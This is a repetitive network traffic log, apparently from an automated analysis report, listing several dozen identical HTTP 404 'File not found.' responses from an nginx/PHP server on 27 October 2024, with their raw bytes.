Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:50:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sun, 27 Oct 2024 07:51:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
